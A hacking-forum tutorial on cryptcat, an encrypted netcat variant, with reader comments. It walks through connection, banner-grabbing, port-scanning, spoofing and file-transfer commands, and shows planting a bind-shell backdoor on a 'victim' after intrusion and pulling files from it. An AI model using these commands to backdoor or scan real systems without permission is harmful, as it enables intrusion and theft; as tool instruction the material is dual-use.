Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Cryptcat: Advanced Usage


Cryptcat: Advanced Usage

By ghostghost | 14790 Reads |
0     0

+=+=+=+=+=+=+=+=+= Cryptcat: Advanced Usage +=+=+=+=+=+=+=+=+=

++||||||> CRYPTCAT <|||||||||++

It is, basically, netcat with encryption (twofish) turned ON. So instead of having communications sent/received in clear text, you have it encrypted in twofish… So it doesn't get sniffed!

This tool is often referred to as the "TCP/IP Swiss Army Knife", because of its ability to establish various connections across networks.

So, if you've ever used netcat, then it should be easy for you to use cryptcat. The Syntax for using command line is the same.

Let's start by explaining the basic usage of it, by examples, then move on to m0re compleX stuff:


First, to establish a connection between two machines, we'd go about this by:

-= making machine #1 (local/victim) listen on a port (with an IP of 192.168.1.1) =-

$ crypcat -l -p 3333

-= Making machine #2 (remote/attacker) establish connection (from 192.168.1.2) =-

$ cryptcat 192.168.1.1 3333


You can also use cryptcat for banner grabbing, ie. for SNMTP servers:

$ cryptcat 192.168.1.1 25 220 192.168.1.1 ESMTP Sendmail 8.10.2+Sun/8.10.2; Sun 19 Feb 2007 12:25:02 -0500 (EST)

this should connect you to the SNMTP server, and output the server's Name and Version.


Can also use cryptcat as a script to banner grab, say on an HTTP server, as such:

$ cryptcat hostname 80 < get_reqst.txt

set get_reqst.txt to contain the following script:

HEAD / HTTP/1.0[ENTER] [ENTER]

(don't actually type in [ENTER], rather, just press it twice) duh!.

OR — try (from the SHELL):

$ echo -e "GET 192.168.1.1 HTTP/1.0nn" | cryptcat –w 5 192.168.1.1 80


Say, instead of using a ROOTKIT after intruding on a computer, you can simply use cryptcat to get a SHELL every time you connect to a port you specify for the local machine to listen onto with cryptcat. This is a simple backd00r. To do this, simply type on the local/victim machine:

$ cryptcat -e /bin/sh -l -p 9999

(that's assuming the user is using UNIX) Now, as the attacker, all you need to do is either connect from your machine (or locally) to the victim, then that should spawn a shell for j00.

$ cryptcat 192.168.1.1 9999 -e /bin/sh


You can even make cryptcat act like a PORT SCANNER with:

$ cryptcat -v -z 192.168.1.1 1-9999

this scans 192.168.1.1 for ports 1 to 9999


Also, you can use it to sp00f your source IP Address:

$ cryptcat -s 69.13.37.69 192.168.1.1

remember, the sp00fed IP address (69.13.37.69) come before the remote IP address (192.168.1.1). This causes the remote host to respond back to the sp00fed IP address. Don't start thinking of how malicious you can be with this!


Ah, yes, and one of my favourites… Transfering Files. To do this, simply, set a computer (not necessarily a victim) to host a file (take_me.txt):

$ cryptcat -v -l -p 9999 < take_me.txt

Now, to get take_me.txt, all we do on the client is:

$ cryptcat -v 192.168.1.1 9999 take_me.txt

Note: 192.168.1.1 is still the server/victim.


And finally, you can use it for source-routing to connect to a port on a remote host:

$ cryptcat -g 69.13.37.69 192.168.1.1 9999

Note: 69.13.37.69 is gateway we're going through to connect to 192.168.1.1 to port 9999

LINKS HOMEPAGE: http://farm9.org/Cryptcat/ Download: http://sourceforge.net/projects/cryptcat/ Man Page: http://www.phlak.org/docs/tools/cryptcat.txt

Hope you learned s0mething at least. Expect more! And …

Always Remember! 1: Netfish is RIGHT. 2: If {you think Netfish is WRONG} then SLAP YOURSELF, and goto the FIRST POINT.

Comments
ghost's avatar
ghost 17 years ago

yet another badass article by the netfish…. let noone say he doesnt contribute. …. lol netfish…. enjoyed the article tho…. :ninja:

ghost's avatar
ghost 17 years ago

o.0 A little confused, next time explain the O/S, that it's unix, etc. Good job though.

ghost's avatar
ghost 17 years ago

Interesting, never even heard of cryptcat, good read.

ghost's avatar
ghost 17 years ago

Keep up the great articles dude. Awesome to read something worthwhile

ghost's avatar
ghost 17 years ago

@HardHackz … no need to explain what OS it is for, it has ports to pretty much all the main ones comprising of, Windows NT, BSD and Linux. The syntax remains the same on all those platforms too.

ghost's avatar
ghost 17 years ago

good article, nice info.

ghost's avatar
ghost 17 years ago

nice work man!:happy:

ghost's avatar
ghost 17 years ago

waste of time